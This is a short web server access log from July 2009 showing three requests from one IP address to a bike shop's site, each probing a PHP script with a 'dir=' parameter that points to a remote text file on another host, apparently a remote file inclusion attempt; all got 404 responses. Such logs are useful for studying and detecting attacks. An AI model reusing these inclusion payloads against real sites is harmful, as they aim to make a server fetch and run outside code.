217.147.30.80 - - [11/Jul/2009:19:48:24 -0700] "GET /skin/zero_vote/error.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.30.80 - - [11/Jul/2009:19:48:24 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.30.80 - - [11/Jul/2009:19:48:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
